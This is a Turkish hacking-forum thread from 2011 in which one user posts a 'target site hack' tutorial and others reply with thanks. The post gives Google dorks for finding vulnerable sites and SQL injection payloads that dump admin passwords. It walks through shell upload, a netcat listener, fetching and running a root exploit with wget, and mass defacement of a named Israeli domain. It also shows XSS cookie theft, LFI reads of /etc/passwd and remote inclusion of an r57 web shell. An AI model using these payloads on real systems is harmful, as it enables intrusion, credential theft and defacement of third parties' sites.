İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Hedef Site Hack (By Bouncer Farkıyla)

19-09-2011 11:44
#1
By Bouncer - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
09/2011
Nereden:
Avrupa
Mesajlar:
322
Teşekkür (Etti):
0
Teşekkür (Aldı):
100
Konular:
32
Ticaret:
(0) %
Bir Teşekkür Eksik Görmeyin !!!

1 ) SQL İnjection

Evet arkadaşlar direk kodlara geçiyorum.
arama kodları : inurl , allinurl , intitle , filetype , indexof...
inurl:’’id=1’’ filetype:asp or php

sql kodlarımız : id=-1+order+by+sayı--
id=-1+order+by+sayı/*
id=-1+union+select+1,2,3,version()+from+information_sc hema.tables--
id=-1+union+select+1,2,3,group_concat(table_name)+from +information_schema.tables+where+table_schema=data base()--
id=-1+union+select+1,2,3,group_concat(column_name)+fro m+information_schema.tables+where+table_name=’admi n’--
eğer yansıtmazsa bilin ki koruma vardır admin kelimesini CHAR lamanız gerekmektedir.
id=-1+union+select+1,2,3,group_concat(password,0x3a,us ername,0x3a,id)+from+admin--
site.com/yonetim veya admin girin shellinizi(lispath) atın linux kernele bakın netcattan bağlanın nc -vv -l -p port
ben 443 ü tercih ediyorum hızlı olması sebebiyle sonra exploitimizi çağırıyoruz wget site.com/exploit
ls -la chmod 777 exploit ./exploit root olduk id=0 uid=0 groupid=0 gibisinden bişiler yazar sonra mass ı çalıştırıp
serverı ağlatın aq istediğiniz gibi olmadı hedefimiz var atıyorum israil.co.il evet symlink ile config
çekiyoruz ve mysql den bağlanıp siteye **** kodumuzu atıyoruz ve hedefimize ulaşmış oluyoruz.


2 ) Xss

Xss genellikle sitelerin arama kısmında veya link üzerinde bulunmaktadır.Eskisi kadar popüler değilse de halen
büyük siteler üzerinde bulunmaktadır.

site.com/search.php? ye geldik
kodumuz : script alert(’hacked by Bouncer’)
evet hata verdi.
şimdi adminin cookiesini çalmak için bir sayfa hazırlıyoruz.
hazırladık.linkimiz hazır admine karamail veya ***** artık nasıl biriyse linkimizi yolluyoruz tıklıyor ve
cookie geldi mozilladan girdik cookie yi değiştirdik anaa adminiz site mucx.


3 ) Lfi (lemofe file inclusion)

Lfi çok tehlikeli olmakla beraber çok süper bir açık türüdür geliştirmeye açıktır en önemlisi.
site.com/index.php?id=../../../../etc/passwd%00
site.com/index.php?id=../../../../proc/self/environ%00
live httpheader den shellimizi postluyoruz site elimizde bu kadar.


4 )RFİ (remote file inclusion)

dosya dahil etmek anlamına gelmektedir.
include
include_once
require
require_once

scriptte aratın eğer sorguyu kontrol etmemişse siteyi istediğiniz hale getirirsiniz.

site.com?index.php?id=badlink.com/r57.php?


5 ) XSRF/CSRF

bu açığımız şifre resetleme gibi bişi olup popüler açıklardandır kullanımıda kolaydır

scriptte inputları değiştirip admine yedirebilirseniz çok kolay sayfayı deface ederseniz dns cache posıoning
yönteminden yararlanmanızda tavsiyemdir.


6 ) Buffer overflow & ****sploit

En deli hacking yöntemidir.Kullanımlarını çoğu hacker bile bilmez.

Araçlar ; Ollydog , c++ compiler

7 ) Brute Force



Bir Teşekkür Eksik Görmeyin !!!

01-10-2011 11:26
#2
By Bouncer - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
09/2011
Nereden:
Avrupa
Mesajlar:
322
Teşekkür (Etti):
0
Teşekkür (Aldı):
100
Konular:
32
Ticaret:
(0) %
Yenileri İşine Çok Yarar
20-10-2011 11:07
#3
dangareus - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2011
Mesajlar:
1.251
Teşekkür (Etti):
1
Teşekkür (Aldı):
69
Konular:
119
Ticaret:
(0) %
güzl paylasım haced
20-10-2011 11:28
#4
alperenbozkurt - ait Kullanıcı Resmi (Avatar)
Binbaşı
Üyelik tarihi:
08/2011
Nereden:
El Castillo Del Diablo
Yaş:
29
Mesajlar:
516
Teşekkür (Etti):
51
Teşekkür (Aldı):
89
Konular:
37
Ticaret:
(0) %
eline sağlık
20-10-2011 12:34
#5
JersaW - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Nereden:
Şehir diyomus venüs yazdm pardon ustaa :D
Mesajlar:
782
Teşekkür (Etti):
27
Teşekkür (Aldı):
355
Konular:
39
Ticaret:
(0) %
sen yazmadın sanırım belirtseydin keşke bide brute force eksik kalmış ben tamamlıyam brute force wordlist yöntemiyle hedef sitenin admin panelini kırmaya yarar ancak bu ordan yüzde 5 i geçmez
Kullanıcı İmzası
/
Abelequbbele Teşekkür etti.
20-10-2011 13:30
#6
PoisonScorpion - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2011
Nereden:
İstanbul
Mesajlar:
1.389
Teşekkür (Etti):
13
Teşekkür (Aldı):
1075
Konular:
431
Ticaret:
(0) %
Fazla ayrıntılı olmamış , ginede tabi elinize sağlık.
23-10-2011 02:07
#7
DarkDesert - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2011
Nereden:
TurkHackTeam
Yaş:
32
Mesajlar:
2.051
Teşekkür (Etti):
127
Teşekkür (Aldı):
582
Konular:
573
Ticaret:
(0) %
tesekkurler eline saglık
06-01-2012 21:23
#8
ege2115 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2011
Mesajlar:
39
Teşekkür (Etti):
0
Teşekkür (Aldı):
1
Konular:
12
Ticaret:
(0) %
dosya nasıl ekleniyor karamaile
06-01-2012 21:32
#9
ege2115 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2011
Mesajlar:
39
Teşekkür (Etti):
0
Teşekkür (Aldı):
1
Konular:
12
Ticaret:
(0) %
saol güzel paylaşım bence
06-01-2012 21:38
#10
Cshoner - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2012
Nereden:
TURKIYE
Mesajlar:
1.204
Teşekkür (Etti):
33
Teşekkür (Aldı):
157
Konular:
631
Ticaret:
(0) %
Biraz Karışık Ama Yapmaya Çalışacağım ..
Kullanıcı İmzası
Aşk Bazıları İçin 3 Harflidir THT

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı